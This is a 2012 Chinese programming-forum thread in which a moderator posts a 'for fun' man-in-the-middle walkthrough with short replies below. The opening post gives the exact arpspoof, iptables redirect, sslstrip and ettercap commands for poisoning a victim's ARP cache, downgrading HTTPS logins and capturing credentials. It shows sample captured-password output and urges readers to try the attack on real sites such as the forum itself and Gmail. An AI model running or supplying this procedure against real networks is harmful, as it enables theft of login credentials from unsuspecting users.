| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2312 人关注过本帖
标题:Man In The Middle 中间人攻击实例 (大家代码写累了就过来看看吧,娱乐一下 ...
取消只看楼主 加入收藏
madfrogme
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:21
帖 子:1160
专家分:1106
注 册:2009-6-24
结帖率:98.63%
收藏
已结贴  问题点数:30 回复次数:4 
Man In The Middle 中间人攻击实例 (大家代码写累了就过来看看吧,娱乐一下)
中间人攻击主要就是利用嗅探器来获得目标的用户名和密码,

应该注明,网上这类文章很多,发出来权当代码写累了,娱乐一下
,

当然这次试验是以嗅探https为目标的,所以要用到sslstrip.

大家可以用这个论坛 bbs.bccn.net  或者 www. 来实验一下,可以成功

我用人人网实验时,并不是用hhtps来登录的,所以嗅探到的密码是一长串ASCII字符

还有很多网站可以,gmail话,貌似安全性能确实不错,但多试两次照样成功

下面说方法

这里需要的工具有3个,都是耳熟能详的arpspoof, ettercap , sslstrip(这是一个只有108行的python脚本)

目标机器(Victim)是192.168.1.100, 路由器是192.168.1.1, 本机(Attacker) 192.168.1.102

1. 首先我们需要修改ettercap的配置文件 etter.conf

我的是在/usr/local/etc/etter.conf

图片附件: 游客没有浏览图片的权限,请 登录注册


看到 # if you use iptables 下面粉红色两行了吧,

把这两行前面的 注释 '#' 去掉

2. 接下来要做的是激活 ip_forward 选项,

# echo 1 > /proc/sys/net/ipv4/ip_forward

3. 接下来要做的就是 arpspoofing 了, 地址不要写反了,路由地址在后面

# arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

这样一来,192.168.1.100 和 192.168.1.1 之间的通信就要全部通过Attacker了,

也就是说Attacker污染了 两台机器的ARP 缓存

4. 打开第二个shell 窗口

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

这样一来, Attacker 就可以把来自80端口的包通过10000端口转送出去了

5.  是时最很重要的一步就是sslstrip, 看名字就是知道,消去ssl

让https看起来像http


# python sslstrip.py -a -k -f

6. 同时打开第三个shell窗口,开始监听

# ettercap -T -q -i wlan0

好了,这时192.168.1.100 这台电脑进入任何需要用https 登录的的网站

输入用户名和密码, 这时Attacker 的 ettercap -T -q -i wlan0 这行命令下面就会出现
 
HTTP : 114.31.104.* :80 -> USER ***@    PASS: ***********     INFO: http://****/的字样了。


[ 本帖最后由 madfrogme 于 2012-11-13 12:55 编辑 ]
搜索更多相关主题的帖子: 娱乐 安全 用户名 gmail 中间人 
2012-11-12 23:58
madfrogme
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:21
帖 子:1160
专家分:1106
注 册:2009-6-24
收藏
得分:0 
以下是引用C_戴忠意在2012-11-13 08:52:23的发言:

貌似,简单的工作复杂化了吧。

感觉不是很复杂啊,三个常规手续,

还求具体解释一下,



如果有更简单的方法,给你加加加加加分

[ 本帖最后由 madfrogme 于 2012-11-13 10:18 编辑 ]

The quieter you become, the more you can hear
2012-11-13 08:41
madfrogme
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:21
帖 子:1160
专家分:1106
注 册:2009-6-24
收藏
得分:0 
以下是引用zklhp在2012-11-13 09:25:59的发言:

没看懂 嗅探一下我的密码试试呗

去嗅嗅看吧,不过linux不同版本上面说到的配置文件可能位置不同,还有就是sslstrip一般不是自带的,好像

[ 本帖最后由 madfrogme 于 2012-11-13 10:01 编辑 ]

The quieter you become, the more you can hear
2012-11-13 08:54
madfrogme
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:21
帖 子:1160
专家分:1106
注 册:2009-6-24
收藏
得分:0 
以下是引用qq872551969在2012-11-13 11:33:26的发言:

抄袭的吧?

恩,过程是完全抄袭的!这篇文字是我写的了!毕竟我只发我试验过的

[ 本帖最后由 madfrogme 于 2012-11-13 12:12 编辑 ]

The quieter you become, the more you can hear
2012-11-13 10:57
madfrogme
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:21
帖 子:1160
专家分:1106
注 册:2009-6-24
收藏
得分:0 
以下是引用zxd543在2012-11-13 21:41:58的发言:

学网络安全时没用过

大学里网络安全方面的课程是什么样的,不是很清楚,想了解一下

The quieter you become, the more you can hear
2012-11-13 20:52
快速回复:Man In The Middle 中间人攻击实例 (大家代码写累了就过来看看吧,娱 ...
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.013261 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved